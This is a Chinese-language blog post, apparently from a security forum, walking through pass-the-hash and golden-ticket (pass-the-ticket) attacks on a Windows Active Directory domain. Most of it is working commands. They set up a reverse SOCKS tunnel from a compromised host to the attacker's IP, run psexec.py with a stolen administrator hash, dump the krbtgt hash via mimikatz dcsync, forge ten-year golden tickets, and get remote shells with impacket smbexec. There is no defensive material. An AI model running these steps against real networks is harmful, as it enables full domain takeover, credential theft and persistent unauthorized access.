pass the hash & pass the ticket

关注 2018-09-11 15:26:50 查看数 11433 ,评论数 0 工具 技术控
一、pass the hash 环境如下: 域控:192.168.3.88 普通域用户电脑:192.168.3.50 渗透测试人员:外网IP 前提:已经获取到域管 hash。 通过socks隧道传递流量 本机执行
./ew_for_linux64 -s rcsocks -l 1008 -e 888
普通域用户电脑执行
ew_for_Win.exe -s rssocks -d xxx.xxx.xxx.x(渗透测试人员IP) -e 888
本机将proxychains DNS配置注释
gedit /etc/proxychains.conf 
《pass the hash & pass the ticket》 在最后一行加入
socks5 127.0.0.1 1008
修改一下本机的hosts
gedit /etc/hosts
《pass the hash & pass the ticket》 最后本机执行
proxychains psexec.py www.exploit.com/administrator@192.168.3.88 -hashes AAD3B435B51404EEAAD3B435B51404EE:DA6FAAD18EC1F32273B103BB93F6E739
《pass the hash & pass the ticket》 《pass the hash & pass the ticket》 二、pass the ticket windows环境 条件
krbtgt用户哈希
域SID
用户名(域管理员)
域名
先导出krbtgt用户的hash
lsadump::dcsync /domain:z3r0.com /user:krbtgt exit
《pass the hash & pass the ticket》 当前sid
S-1-5-21-407751361-567583359-960223070
《pass the hash & pass the ticket》 使用krbtgt-aes256构造凭证
mimikatz # kerberos::golden /domain:www.exploit.com /sid:S-1-5-21-2004856312-292
8937096-2895403271 /aes256:3d1bc66a4d237559218110b38bcfd02d9317fab8287841cd0e1f6
e3064f4131c /user:admnistrator /ticket:gold.kirbi
《pass the hash & pass the ticket》 或使用krbtgt-ntlm值构造票据
kerberos::golden /domain:z3r0.com /sid:S-1-5-21-407751361-567583359-960223070 /krbtgt:a5e7a102c81780d803aec2013d29f83a /user:admnistrator /ticket:ntlm.kirbi
运行后会在当前目录生成一张票 然后用mimikatz伪造凭证
kerberos::ptt C:Userstomcat.WWWDesktopmimikatz_trunkx64gold.kirbi
票据的有效期为10年 成功拥有域管理员权限 《pass the hash & pass the ticket》 可以通过psexec等工具在任意域内机器上执行命令 《pass the hash & pass the ticket》 《pass the hash & pass the ticket》 linux环境(IP变了和上面环境不同) 首先构造票据
root@kali:~/tools/impacket/examples# python ticketer.py -nthash d5e324180b99f43bc578dc54bed16573 -domain-sid S-1-5-21-3112130590-9669671-206853883 -domain z3r0.com administrator
《pass the hash & pass the ticket》 再添加环境变量
root@kali:~/tools/impacket/examples# pwd
/root/tools/impacket/examples
root@kali:~/tools/impacket/examples# export KRB5CCNAME=/root/tools/impacket/examples/administrator.ccache
root@kali:~/tools/impacket/examples# echo $KRB5CCNAME
/root/tools/impacket/examples/administrator.ccache
《pass the hash & pass the ticket》 最后就可以用impacket里的工具进行连接了
python smbexec.py administrator@WIN-7EF724SF4OF.z3r0.com -k -no-pass
注意这里不要使用ip 《pass the hash & pass the ticket》
交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧
css.php
正在加载中...